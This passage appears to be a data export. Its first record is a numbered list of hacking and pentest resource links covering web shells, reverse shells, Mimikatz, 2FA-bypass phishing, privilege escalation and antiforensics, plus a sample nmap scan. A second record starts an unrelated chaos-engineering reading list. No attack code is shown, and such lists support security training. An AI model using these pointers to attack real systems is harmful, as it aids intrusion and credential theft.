:\n\n\n\nhttps://ethicalhackingguru.com/inject-shellcode-memory-using-unicorn\n\n\n\n\n-1873-Macros and More with SharpShooter v2.0:\n\n\n\nhttps://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0\n\n\n\n\n-1874-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example:\n\n\n\nhttps://www.guru99.com/fuzz-testing\n\n\n\n\n-1875-Introduction to File Format Fuzzing & Exploitation:\n\n\n\nhttps://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3\n\n-1876-Hacking a social media account and safeguarding it:\n\nhttps://medium.com/@ujasdhami79/hacking-a-social-media-account-and-safeguarding-it-e5f69adf62d7\n\n-1877-OTP Bypass on India’s Biggest Video Sharing Site:\n\nhttps://medium.com/bugbountywriteup/otp-bypass-on-indias-biggest-video-sharing-site-e94587c1aa89\n\n-1879-Getting Root on macOS via 3rd Party Backup Software:\n\nhttps://medium.com/tenable-techblog/getting-root-on-macos-via-3rd-party-backup-software-b804085f0c9\n\n\n-1880-How to Enumerate MYSQL Database using Metasploit:\n\n\nhttps://ehacking.net/2020/03/how-to-enumerate-mysql-database-using-metasploit-kali-linux-tutorial.html\n\n\n-1881-Exploiting Insecure Firebase Database!\n\n\nhttps://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty\n\n\n-1882-Penetration Testing - Complete Guide:\n\nhttps://softwaretestinghelp.com/penetration-testing-guide\n\n\n-1883-How To Upload A PHP Web Shell On WordPress Site:\n\n\nhttps://1337pwn.com/how-to-upload-php-web-shell-on-wordpress-site\n\n\n-1884-Mimikatz tutorial: How it hacks Windows passwords, credentials:\n\n\nhttps://searchsecurity.techtarget.com/tutorial/Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials\n\n\n\n-1885-Ethical hacking: Lateral movement techniques:\n\n\nhttps://securityboulevard.com/2019/09/ethical-hacking-lateral-movement-techniques\n\n\n-1886-A Pivot Cheatsheet for Pentesters:\n\n\nhttp://nullsweep.com/pivot-cheatsheet-for-pentesters\n\n\n-1887-What to 
Look for When Reverse Engineering Android Apps:\n\n\nhttp://nowsecure.com/blog/2020/02/26/what-to-look-for-when-reverse-engineering-android-apps\n\n\n\n-1888-Modlishka: Advance Phishing to Bypass 2 Factor Auth:\n\n\nhttp://crackitdown.com/2019/02/modlishka-kali-linux.html\n\n\n-1889-Bettercap Usage Examples (Overview, Custom setup, Caplets ):\n\n\nwww.cyberpunk.rs/bettercap-usage-examples-overview-custom-setup-caplets\n\n\n-1890-The Complete Hashcat Tutorial:\n\n\nhttps://ethicalhackingguru.com/the-complete-hashcat-tutorial\n\n\n\n-1891-Wireless Wifi Penetration Testing Hacker Notes:\n\n\nhttps://executeatwill.com/2020/01/05/Wireless-Wifi-Penetration-Testing-Hacker-Notes\n\n\n-1892-#BugBounty writeups:\n\nhttps://pentester.land/list-of-bug-bounty-writeups.html\n\n\n\n-1893-Kerberoasting attack:\n\n\nhttps://en.hackndo.com/kerberoasting\n\n\n-1894-A Pentester's Guide - Part 2 (OSINT - LinkedIn is not just for jobs):\n\n\nhttps://delta.navisec.io/osint-for-pentesters-part-2-linkedin-is-not-just-for-jobs\n\n\n-1895-Radare2 cutter tutorial:\n\nhttp://cousbox.com/axflw/radare2-cutter-tutorial.html\n\n\n-1896-Cracking Password Hashes with Hashcat:\n\n\nhttp://hackingvision.com/2020/03/22/cracking-password-hashes-hashcat\n\n\n\n-1897-From CSRF to RCE and WordPress-site takeover CVE-2020-8417:\n\n\nhttp://blog.wpsec.com/csrf-to-rce-wordpress\n\n\n-1898-Best OSINT Tools:\n\n\nhttp://pcwdld.com/osint-tools-and-software\n\n\n\n-1899-Metasploit Exploitation Tool 2020:\n\n\nhttp://cybervie.com/blog/metasploit-exploitation-tool\n\n\n\n-1900-How to exploit CVE-2020-7961:\n\n\nhttps://synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html\n\n\n\n-1901-PowerShell for Pentesters:\n\n\nhttps://varonis.com/blog/powershell-for-pentesters\n\n\n-1902-Android Pentest Tutorial:\n\n\nhttps://packetstormsecurity.com/files/156432/Android-Pentest-Tutorial-Step-By-Step.html\n\n\n\n-1903-Burp Suite 
Tutorial:\n\n\nhttps://pentestgeek.com/web-applications/burp-suite-tutorial-1\n\n\n\n-1904-Company Email Enumeration + Breached Email Finder:\n\n\n\nhttps://metalkey.github.io/company-email-enumeration--breached-email-finder.html\n\n\n-1905-Kali Linux Cheat Sheet for Penetration Testers:\n\n\nhttps://github.com/NoorQureshi/kali-linux-cheatsheet\n\n\n-1906-Active Directory Exploitation Cheat Sheet:\nA cheat sheet that contains common enumeration and attack methods for Windows Active Directory.\n\n\nhttps://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#using-bloodhound \n\n\n\n-1907-Advanced Hacking Tutorials Collection:\n\n\nhttps://yeahhub.com/advanced-hacking-tutorials-collection\n\n\n\n-1908-Persistence – DLL Hijacking:\n\n\nhttps://pentestlab.blog/2020/03/04/persistence-dll-hijacking\n\n\n\n-1909-Brute force and dictionary attacks: A cheat sheet:\n\n\nhttps://techrepublic.com/article/brute-force-and-dictionary-attacks-a-cheat-sheet\n\n\n\n\n\n\n-1910-How to use Facebook for Open Source Investigation:\n\n\nhttps://securitynewspaper.com/2020/03/11/how-to-use-facebook-for-open-source-investigation-osint\n\n\n-1911-tcpdump Cheat Sheet:\n\n\nhttps://comparitech.com/net-admin/tcpdump-cheat-sheet\n\n\n\n-1912-Windows Post exploitation recon with Metasploit:\n\n\nhttps://hackercool.com/2016/10/windows-post-exploitation-recon-with-metasploit\n\n\n\n-1913-Bug Hunting Methodology:\n\n\nhttps://blog.usejournal.com/bug-hunting-methodology-part-1-91295b2d2066\n\n\n-1914-Malware traffic analysis tutorial:\n\n\nhttps://apuntpsicolegs.com/veke0/malware-traffic-analysis-tutorial.html\n\n\n\n-1915-Recon-ng v5 Tutorial:\n\n\nhttps://geekwire.eu/recon-ng-v5-tutorial\n\n\n\n-1916-Windows and Linux Privilege Escalation Tools:\n\n\nhttps://yeahhub.com/windows-linux-privilege-escalation-tools-2019\n\n\n\n-1917-Total OSCP Guide:\n\n\nhttps://sushant747.gitbooks.io/total-oscp-guide\n\n\n-1918-Phishing Windows 
Credentials:\n\n\nhttps://pentestlab.blog/2020/03/02/phishing-windows-credentials\n\n\n-1919-Getting What You're Entitled To: A Journey Into MacOS Stored Credentials:\n\n\nhttps://mdsec.co.uk/2020/02/getting-what-youre-entitled-to-a-journey-in-to-macos-stored-credentials\n\n\n\n-1920-Recent Papers Related To Fuzzing:\n\n\nhttps://wcventure.github.io/FuzzingPaper\n\n\n\n\n-1921-Web Shells 101 Using PHP (Web Shells Part 2):\n\n\nhttps://acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/\n\n\n\n-1922-Python3 reverse shell:\n\n\n\nhttps://polisediltrading.it/hai6jzbs/python3-reverse-shell.html\n\n\n\n-1923-Reverse Shell between two Linux machines:\n\n\n\nhttps://yeahhub.com/reverse-shell-linux-machines\n\n\n\n-1924-Tutorial - Writing Hardcoded Windows Shellcodes (32bit):\n\n\n\nhttps://dsolstad.com/shellcode/2020/02/02/Tutorial-Hardcoded-Writing-Hardcoded-Windows-Shellcodes-32bit.html\n\n\n\n\n-1925-How to Use Wireshark: Comprehensive Tutorial + Tips:\n\n\n\nhttps://varonis.com/blog/how-to-use-wireshark\n\n\n\n-1926-How To Use PowerShell for Privilege Escalation with Local Privilege Escalation?\n\n\n\nhttps://varonis.com/blog/how-to-use-powershell-for-privilege-escalation-with-local-computer-accounts\n\n\n\n-1927-Ethical hacking:Top privilege escalation techniques in Windows:\n\n\nhttps://securityboulevard.com/2020/03/ethical-hacking-top-privilege-escalation-techniques-in-windows\n\n\n\n-1928-How to Identify Company's Hacked Email Addresses:\n\n\n\nhttps://ehacking.net/2020/04/how-to-identify-companys-hacked-email-addresses-using-maltego-osint-haveibeenpawned.html\n\n\n\n-1929-Android APK Reverse Engineering: What's in an APK:\n\n\n\nhttps://secplicity.org/2019/09/11/android-apk-reverse-engineering-whats-in-an-apk\n\n\n\n\n\n-1930-Keep Calm and HackTheBox - Beep:\n\n\nhttps://freecodecamp.org/news/keep-calm-and-hack-the-box-beep/\n\n\n-1931-Keep Calm and HackTheBox 
-Legacy:\n\n\nhttps://freecodecamp.org/news/keep-calm-and-hack-the-box-legacy/\n\n\n\n-1932-Keep Calm and HackTheBox -Lame:\n\n\nhttps://freecodecamp.org/news/keep-calm-and-hack-the-box-lame/\n\n\n\n\n-1933-HacktheBox:Writeup Walkthrough:\n\n\nhttps://hackingarticles.in/hack-the-box-writeup-walkthrough\n\n\n\n-1934-2020 OSCP Exam Preparation:\n\n\n\nhttps://cybersecurity.att.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp\n\n\n\n-1935-My OSCP transformation:\n\n\nhttps://kevsec.fr/journey-to-oscp-2019-write-up\n\n\n\n-1936-A Detailed Guide on OSCP Preparation:\n\n\n\nhttps://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/\n\n\n\n-1937-Useful Commands and Tools - #OSCP:\n\n\nhttps://yeahhub.com/useful-commands-tools-oscp/\n\n\n-1938-Comprehensive Guide on Password Spraying Attack\n\n\nhttps://hackingarticles.in/comprehensive-guide-on-password-spraying-attack\n\n\n-1939-Privilege Escalation:\n\n\nhttps://pentestlab.blog/category/privilege-escalation/\n\n\n-1940-Red Team:\n\n\nhttps://pentestlab.blog/category/red-team/\n\n\n\n-1941-Linux post-exploitation.Advancing from user to super-user in a few clicks\n\n\n\nhttps://hackmag.com/security/linux-killchain/\n\n\n\n-1942--#BugBounty Cheatsheet\n\n\nhttps://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html\n\n\n-1943--#Windows Notes/Cheatsheet\n\n\nhttps://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html\n\n\n-1944-#Linux Notes/Cheatsheet\n\n\nhttps://m0chan.github.io/2018/07/31/Linux-Notes-And-Cheatsheet.html\n\n\n-1945-Windows Notes\n\n\nhttps://mad-coding.cn/tags/Windows/\n\n\n-1946-#BlueTeam CheatSheet\n\n\nhttps://gist.github.com/SwitHak/62fa7f8df378cae3a459670e3a18742d\n\n\n-1947-Linux Privilege Escalation Cheatsheet for OSCP:\n\n\nhttps://hackingdream.net/2020/03/linux-privilege-escalation-cheatsheet-for-oscp.html\n\n\n\n-1948-Shodan Pentesting Guide:\n\n\nhttps://community.turgensec.com/shodan-pentesting-guide\n \n \n \n -1949-Pentesters 
Guide to PostgreSQL Hacking:\n \n \n https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007\n\n\n\n\n-1950-Hacking-OSCP cheatsheet:\n\n\nhttps://ceso.github.io/posts/2020/04/hacking/oscp-cheatsheet/\n\n\n-1951-A Comprehensive Guide to Breaking SSH:\n\n\n\nhttps://community.turgensec.com/ssh-hacking-guide\n\n\n\n\n-1952-Windows Privilege Escalation Methods for Pentesters:\n\n\n\nhttps://pentest.blog/windows-privilege-escalation-methods-for-pentesters/\n\n\n\n-1953-Best #firefox addons for #Hacking:\n\n\nhttps://twitter.com/cry__pto/status/1210836734331752449\n\n\n\n-1954-S3 Bucket Enumeration Tools:\n\n\nhttps://twitter.com/cry__pto/status/1269862357645307904\n\n\n-1955-Github Recon Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1269362041044832257\n\n\n\n\n-1956-i created this group for more in depth sharing about hacking and penetration testing /daily posts: you can join:\n\n\n\nhttps://facebook.com/groups/AmmarAmerHacker\n\n\n\n-1957-Directory Bruteforcing Tools: && SCREENSHOTTING Tools:\n\n\nhttps://twitter.com/cry__pto/status/1270603017256124416\n\n\n\n-1958-S3 Bucket Enumeration Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1269862357645307904\n\n\n\n-1959-Github Recon Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1269362041044832257\n\n\n\n\n-1960-Website Mirroring Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1248640849812078593\n\n\n\n-1961-automated credential discovery tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1253214720372465665\n\n\n\n-1962-Antiforensics Techniques:\n\n\n\nhttps://twitter.com/cry__pto/status/1215001674760294400\n\n\n\n-1963-#bugbounty tools part (1):\n\n\nhttps://twitter.com/cry__pto/status/1212096231301881857\n\n\n\n1964-Binary Analysis Frameworks:\n\n\n\nhttps://twitter.com/cry__pto/status/1207966421575184384\n\n\n\n-1965-#BugBounty tools part (5):\n\n\n\nhttps://twitter.com/cry__pto/status/1214850754055458819\n\n\n\n-1966-#BugBounty tools part 
(3):\n\n\nhttps://twitter.com/cry__pto/status/1212290510922158080\n\n\n\n-1967-Kali Linux Commands List (Cheat Sheet):\n\n\n\nhttps://twitter.com/cry__pto/status/1264530546933272576\n\n\n\n-1968-#BugBounty tools part (4):\n\n\n\nhttps://twitter.com/cry__pto/status/1212296173412851712\n\n\n\n\n-1969--Automated enumeration tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1214919232389099521\n\n\n\n-1970-DNS lookup information Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1248639962746105863\n\n\n\n\n-1971-OSCP:\n\n\nhttps://twitter.com/cry__pto/status/1262089078339756032\n\n\n\n-1972-Social Engineering Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1180731438796333056\n\n\n\n-1973-Hydra :\n\n\nhttps://twitter.com/cry__pto/status/1247507926807449600\n\n\n\n-1974-#OSINT Your Full Guide:\n\n\n\nhttps://twitter.com/cry__pto/status/1244433669936349184\n\n\n\n-1975-#BugBounty tools part (2):\n\n\n\nhttps://twitter.com/cry__pto/status/1212289852059860992\n\n\n\n-1976-my own ebook library:\n\n\n\nhttps://twitter.com/cry__pto/status/1239308541468516354\n\n\n\n\n-1977-Practice part (2):\n\n\n\nhttps://twitter.com/cry__pto/status/1213165695556567040\n\n\n\n-1978-Practice part (3):\n\n\n\nhttps://twitter.com/cry__pto/status/1214220715337097222\n\n\n\n\n-1979-my blog:\n\n\n\nhttps://twitter.com/cry__pto/status/1263457516672954368\n\n\n-1980-Practice:\n\n\n\nhttps://twitter.com/cry__pto/status/1212341774569504769\n\n\n\n-1981-how to search for XSS without proxy tool:\n\n\nhttps://twitter.com/cry__pto/status/1252558806837604352\n\n\n\n-1982-How to collect email addresses from search engines:\n\n\n\nhttps://twitter.com/cry__pto/status/1058864931792138240\n\n\n\n-1983-Hacking Tools Cheat Sheet:\n\n\n\nhttps://twitter.com/cry__pto/status/1255159507891687426\n\n\n-1984-#OSCP Your Full Guide:\n\n\n\nhttps://twitter.com/cry__pto/status/1240842587927445504\n\n\n\n-1985-#HackTheBox Your Full Guide:\n\n\nhttps://twitter.com/cry__pto/status/1241481478539816961\n\n\n\n\n-1986-Web 
Scanners:\n\n\n\nhttps://twitter.com/cry__pto/status/1271826773009928194\n\n\n-1987-HACKING MAGAZINES:\n\n-1-2600 — The Hacker Quarterly magazine:www.2600.com\n\n-2-Hackin9:http://hakin9.org\n\n-3-(IN)SECURE magazine:https://lnkd.in/grNM2t8\n\n-4-PHRACK:www.phrack.org/archives\n\n-5-Hacker’s Manual 2019\n\n\n-1988-Web Exploitation Tools:\n\n\nhttps://twitter.com/cry__pto/status/1272778056952885249\n\n\n\n\n\n-1989-Kali Linux Cheat Sheet for Hackers:\n\n\nhttps://twitter.com/cry__pto/status/1272792311236263937\n\n\n\n-1990-Web Exploitation Tools:\n\n\nhttps://twitter.com/cry__pto/status/1272778056952885249\n\n\n\n\n-1991-2020 OSCP Exam Preparation + My OSCP transformation +A Detailed Guide on OSCP Preparation + Useful Commands and Tools - #OSCP:\n\n\nhttps://twitter.com/cry__pto/status/1262089078339756032\n\n\n\n-1992-100 Best Hacking Tools for Security Professionals in 2020:\n\n\nhttps://gbhackers.com/hacking-tools-list/\n\n\n\n-1993-SNMP Enumeration:\n\nOpUtils:www.manageengine.com\n\nSNMP Informant:www.snmp-informant.com\n\nSNMP Scanner:www.secure-bytes.com\n\nSNMPUtil:www.wtcs.org\n\nSolarWinds:www.solarwinds.com\n\n\n\n\n\n\n\n-1994-INFO-SEC RELATED CHEAT SHEETS:\n\n\nhttps://twitter.com/cry__pto/status/1274768435361337346\n\n\n\n-1995-METASPLOIT CHEAT SHEET:\n\n\nhttps://twitter.com/cry__pto/status/1274769179548278786\n\n\n\n\n-1996-Nmap Cheat Sheet, plus bonus Nmap + Nessus:\n\n\nhttps://twitter.com/cry__pto/status/1275359087304286210\n\n\n-1997-Wireshark Cheat Sheet - Commands, Captures, Filters, Shortcuts & More:\n\n\n\nhttps://twitter.com/cry__pto/status/1276391703906222080\n\n\n\n-1998-learn penetration testing a great series as PDF:\n\n\nhttps://twitter.com/cry__pto/status/1277588369426526209\n\n\n-1999-Detecting secrets in code committed to Gitlab (in real time):\n\n\nhttps://www.youtube.com/watch?v=eCDgUvXZ_YE\n\n\n-2000-Penetration Tester’s Guide to Evaluating OAuth 2.0 — Authorization Code 
Grants:\n\n\nhttps://maxfieldchen.com/posts/2020-05-17-penetration-testers-guide-oauth-2.html\n\n\n\n-2001-Building Virtual Machine Labs:\n\n\nhttps://github.com/da667/Building_Virtual_Machine_Labs-Live_Training\n\n\n\n-2002-Windows Kernel Exploit Cheat Sheet for [HackTheBox]:\n\n\nhttps://kakyouim.hatenablog.com/entry/2020/05/27/010807 \n\n\n-2003-19 Powerful Penetration Testing Tools In 2020 (Security Testing Tools):\n\n\nhttps://softwaretestinghelp.com/penetration-testing-tools/ \n\n\n-2004-Full Connect Scan (-sT):\n\n-complete the three-way handshake\n\n-slower than SYN scan\n\n-no need for superuser Privileges\n\n-when stealth is not required\n\n-to know for sure which port is open\n\n-when running port scan via proxies like TOR\n\n-it can be detected\n\nnmap -sT -p 80 192.168.1.110\n\n\n-2005-today i learned that you can use strings command to extract email addresses from binary files:\n\n\nstrings -n 8 /usr/bin/who | grep '@'"
2,"# Awesome Chaos Engineering [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)\n\nA curated list of awesome [Chaos Engineering](http://principlesofchaos.org/) resources.\n\n#### What is Chaos Engineering?\n> Chaos Engineering is the discipline of experimenting on a distributed system in order to build confidence in the system’s capability to withstand turbulent conditions in production. - [Principles Of Chaos Engineering](http://principlesofchaos.org/) website.\n\n## Contents\n- [Culture](#culture)\n- [Books](#books)\n- [Education](#education)\n- [Notable Tools](#notable-tools)\n- [Papers](#papers)\n- [Gamedays](#gamedays)\n- [Blogs & Newsletters](#blogs--newsletters)\n- [Conferences & Meetups](#conferences--meetups)\n- [Forums](#forums)\n- [Twitter](#twitter)\n\n## Culture\n* [Principles Of Chaos Engineering](http://principlesofchaos.org/)\n* [Chaos Community](http://chaos.community/)\n* [Chaos Engineering](https://www.infoq.com/articles/chaos-engineering)\n* [O'Reilly Velocity San Jose 2017: Precision Chaos](https://www.youtube.com/watch?v=C11LNUEaHuo)\n* [The Discipline of Chaos Engineering](https://www.gremlin.com/blog/the-discipline-of-chaos-engineering/)\n* [Chaos Monkey for Fun and Profit](https://sharpend.io/chaos-monkey-for-fun-and-profit/)\n* [Fault Injection in Production: Making the case for resilience testing](https://queue.acm.org/detail.cfm?id=2353017)\n* [Lord of Chaos - Becoming a Chaos Engineer](https://vimeo.com/groups/jz2016/videos/181925286)\n* [Chaos testing - Preventing failure by instigation](http://www.cakesolutions.net/teamblogs/chaos-testing-preventing-failure-by-instiga)\n* [Orchestrated Chaos](https://docs.google.com/presentation/d/1zzHS3qoPGzwsSna5-uk3Xt7LW_3Fr6ag8JDkeyrKwL4/edit#slide=id.p)\n* Choose your own adventure: Chaos Engineering - [Video](https://www.infoq.com/presentations/adopt-chaos-engineering) & 
[Slides](https://www.slideshare.net/NoraJones1/choose-your-own-adventure-qcon-2017-1)\n* [AMA Chaos Engineering + DiRT](http://pages.catchpoint.com/AMA-Chaos-DiRT.html)\n* [SRECON17: Principles of Chaos Engineering](https://www.usenix.org/conference/srecon17americas/program/presentation/rosenthal)\n* [Chaos & Intuition Engineering at Netflix](https://www.youtube.com/watch?v=Q4nniyAarbs)\n* [Mastering Chaos - A Netflix Guide to Microservices](https://www.youtube.com/watch?v=CZ3wIuvmHeM)\n* [Too big to test: Breaking a production brokerage platform without causing financial devastation](https://conferences.oreilly.com/velocity/devops-web-performance-ny-2015/public/schedule/detail/45012)\n* [Inside Azure Search: Chaos Engineering](https://azure.microsoft.com/en-us/blog/inside-azure-search-chaos-engineering/)\n* [Netflix, the Simian Army, and the culture of freedom and responsibility](https://devops.com/netflix-the-simian-army-and-the-culture-of-freedom-and-responsibility/)\n* [FIT: Failure Injection Testing](https://medium.com/netflix-techblog/fit-failure-injection-testing-35d8e2a9bb2)\n* [The Netflix Simian Army](https://medium.com/netflix-techblog/the-netflix-simian-army-16e57fbab116)\n* [Automated Failure Testing](https://medium.com/netflix-techblog/automated-failure-testing-86c1b8bc841f)\n* [The Verification of a Distributed System by Caitie McCaffrey](http://queue.acm.org/detail.cfm?ref=rss&id=2889274)\n* [The Journey to Chaos Engineering begins with a single step - Bruce Wong and James Burns (Twilio)](https://www.youtube.com/watch?v=rKAo2wANiHM)\n* [Chaos Engineering by Lorin Hochstein](https://www.youtube.com/watch?v=vq4QZ4_YDok)\n* [Aaron Rinehart - ChaoSlingr: Introducing Security based Chaos Testing](https://www.youtube.com/watch?v=BLRb-E0G5zk)\n* [Chaos Engineering - Casey Rosenthal](https://www.youtube.com/watch?v=6OIOpx_dVFY)\n* The Road to Chaos - Velocity 2017- [video](https://www.youtube.com/watch?v=FCZVAZaXIjs) & 
[slides](https://github.com/norajones/Presentations/blob/master/The%20Road%20To%20Chaos%20-%20Velocity%202017.pdf)\n* [How Netflix DDoS’d Itself To Help Protect the Entire Internet](https://www.wired.com/story/netflix-ddos-attack)\n* [10 Years of Crashing Google](https://www.usenix.org/conference/lisa15/conference-program/presentation/krishnan)\n* [Weathering the Unexpected](http://queue.acm.org/detail.cfm?id=2371516)\n* [SRECON17: Breaking Things on Purpose](https://youtu.be/h_-shm0SL08)\n* [PuppetConf 2016: Chaos Patterns - Architecting for Failure in Distributed Systems](https://youtu.be/V3P35N_HXNQ)\n* [Ship More, Sink Less - Changing Chaos Engineering and Distributed Tracing](https://youtu.be/nr2KWbyWAmA)\n* [Cloudcast - Discipline of Chaos Engineering](http://www.thecloudcast.net/2017/05/the-cloudcast-299-discipline-of-chaos.html)\n* [Software Engineering Daily - Failure Injection with Kolton Andrus podcast](https://softwareengineeringdaily.com/2017/03/29/failure-injection-with-kolton-andrus/)\n* [Responding to Failures in Playback Features with Haley Tucker podcast](https://www.infoq.com/podcasts/netflix-haley-tucker?utm_campaign=infoq_content&utm_source=twitter&utm_medium=feed&utm_term=architecture-design)\n* [""Antics, drift, and chaos"" by Lorin Hochstein](https://youtu.be/SM2uXpmyJmA)\n* [re:invent 2017: Nora Jones Describes Why We Need More Chaos - Chaos Engineering, That Is](https://youtu.be/rgfww8tLM0A)\n* [Failure Friday: Four Years On](https://www.pagerduty.com/blog/failure-fridays-four-years/)\n* [Monkeys & Lemurs and Locusts, Oh my!](https://www.slideshare.net/zgrinch/monkeys-lemurs-and-locusts-oh-my)\n* [Practical Chaos Engineering](https://youtu.be/Yn4tYxqzFVU)\n* [Chaos Day in the Met Office Cloud](https://www.cloudreach.com/fr/blog/training-cloud-operations-teams-met-office/)\n* [Cloud Native and Chaos Engineering](https://medium.com/chaosiq/cloud-native-and-chaos-engineering-20842ee2fa8a)\n* [Chaos Engineering with Kolton 
Andrus](https://softwareengineeringdaily.com/2018/02/02/chaos-engineering-with-kolton-andrus/)\n* [Chaos Engineering: the history, principles, and practice](https://www.gremlin.com/community/tutorials/chaos-engineering-the-history-principles-and-practice/)\n* [Embracing the Chaos of Chaos Engineering](https://blog.codeship.com/embracing-the-chaos-of-chaos-engineering/)\n* [Designing Services for Resilience: Netflix Lessons](https://www.infoq.com/presentations/netflix-microservices-resiliency)\n* [Chaos Engineering: A cheat sheet](https://www.techrepublic.com/article/chaos-engineering-a-cheat-sheet/)\n* [How to convince your boss and make them say “Yes!” to Chaos Engineering?](https://medium.com/@crochefolle/how-to-convince-your-boss-to-make-them-say-yes-to-chaos-engineering-796ba119bd7)\n* [Why the World Needs More Resilient Systems](https://www.infoq.com/news/2018/03/resilient-systems-chaos-engineer)\n* [Chaos Architecture](https://www.infoq.com/presentations/chaos-architecture-mindset)\n* [Gremlin’s Tammy Bütow on the Business Side of Chaos Engineering](https://thenewstack.io/gremlins-tammy-butow-on-the-business-side-of-chaos-engineering/)\n* [Kubernetes Chaos Engineering: Lessons Learned](https://learnk8s.io/blog/kubernetes-chaos-engineering-lessons-learned)\n* [Chaos Engineering: managing complexity by breaking things](https://hub.packtpub.com/chaos-engineering-managing-complexity-by-breaking-things/)\n* [Podcast:Database Chaos with Tammy Butow](https://softwareengineeringdaily.com/2018/04/10/database-chaos-with-tammy-butow/)\n* [LinkedOut: A Request-Level Failure Injection Framework](https://engineering.linkedin.com/blog/2018/05/linkedout--a-request-level-failure-injection-framework)\n* [GOTO 2018 - Breaking Things on Purpose - Kolton Andrus](https://youtu.be/S89ox7oQn8s)\n* [Why should Chaos be part of your Distributed Systems Engineering?](https://medium.com/@bbideep/why-should-chaos-be-part-of-your-distributed-systems-engineering-5bcb21497660)\n* [Brian 
Holt - Chaos Monkeys in Your Browser What Chaos Engineering Means For the Front End](https://www.youtube.com/watch?v=A4_rRj-4Mv0)\n* [Chaos Engineering: Why the World Needs More Resilient Systems](https://www.youtube.com/watch?time_continue=242&v=Khqf0XltR_M)\n* QCon·Beijing 2017: The Practice of Failure Management and Fault Injection at Alibaba E-Commerce Platforms - [video](http://www.infoq.com/cn/presentations/ali-electricity-supplier-fault-management-and-fault-drills-practice) & [speech draft](http://jm.taobao.org/2017/06/22/20170622/) (Chinese speech)\n* [Orchestrating Chaos using Grab's Experimentation Platform](https://engineering.grab.com/chaos-engineering)\n* [Breaking to Learn: Chaos Engineering Explained](https://blog.newrelic.com/engineering/chaos-engineering-explained/)\n* [Chaos Engineering Traps](https://medium.com/@njones_18523/chaos-engineering-traps-e3486c526059)\n* [Chaos Engineering - The Art of Breaking Things Purposefully](https://medium.com/@adhorn/chaos-engineering-ab0cc9fbd12a)\n* [Disasterpiece Theater: Slack’s process for approachable Chaos Engineering](https://slack.engineering/disasterpiece-theater-slacks-process-for-approachable-chaos-engineering-3434422afb54)\n* [Taming chaos: Preparing for your next incident](https://www.oreilly.com/ideas/taming-chaos-preparing-for-your-next-incident)\n* [The Future of Chaos Engineering w/ Conde Nast](https://www.youtube.com/watch?v=RqM2sMt11Bw)\n* [Chaos Engineering For People Systems w/ Dave Rensin of Google](https://www.youtube.com/watch?v=sn6wokyCZSA)\n* [Performing chaos engineering in a serverless world (AWS re:Invent 2019 CMY301)](https://www.youtube.com/watch?v=vbyjpMeYitA)\n* [Building Confidence in Healthcare Systems through Chaos Engineering](https://www.infoq.com/presentations/cerner-resiliency)\n* [Break Your App before Someone Else Does](https://www.infoq.com/presentations/test-android-apk/)\n* [Preparing for Traffic Spikes with Chaos 
Engineering](https://www.bigmarker.com/gremlin/Preparing-for-Traffic-Spikes-with-Chaos-Engineering)\n* [Automating Chaos Engineering GameDays with Terraform](https://www.youtube.com/watch?v=NOOgKNbW0gk)\n* [Postmortem Culture: Learning from failure](https://www.youtube.com/watch?v=JtLrlDNdJzg&feature=youtu.be)\n* [Problem Detection by John Allspaw](https://www.youtube.com/watch?v=NxctiGRI2y8)\n* [New Paradigms for the Next Era of Security](https://www.rsaconference.com/industry-topics/webcast/35-new-paradigms-for-the-next-era-of-security)\n* [Cloud-Native Chaos Engineering](https://dev.to/umamukkara/chaos-engineering-for-cloud-native-systems-2fjn)\n* [Building resilient services at Prime Video with chaos engineering](https://aws.amazon.com/blogs/opensource/building-resilient-services-at-prime-video-with-chaos-engineering/)\n* [Making Chaos Part of Kubernetes/OpenShift Performance and Scalability Tests](https://www.openshift.com/blog/making-chaos-part-of-kubernetes/openshift-performance-and-scalability-tests)\n* [Lucky Lotto, chaos engineering but for teams](https://danlebrero.com/2021/06/30/cto-dairy-lucky-lotto-chaos-engineering-for-teams/)\n* [Using Fault Injection Testing to Improve DoorDash Reliability](https://doordash.engineering/2022/04/25/using-fault-injection-testing-to-improve-doordash-reliability/)\n* [Chaos Engineering At Ant Group](https://medium.com/@monkeysuzie/chaos-engineering-at-ant-group-30c15cb6ab69)\n\n## Books\n* [Chaos Engineering: Building Confidence in System Behavior through Experiment](http://www.oreilly.com/webops-perf/free/chaos-engineering.csp)\n* [Site Reliability Engineering: How Google Runs Production Systems](https://landing.google.com/sre/book.html) -\n* [The Practice Of Cloud System Administration: Designing and Operating Large Distributed Systems](http://the-cloud-book.com/)\n* [Antifragile Systems and Teams](http://www.oreilly.com/webops-perf/free/antifragile-systems-and-teams.csp)\n* [The InfoQ eMag: Chaos 
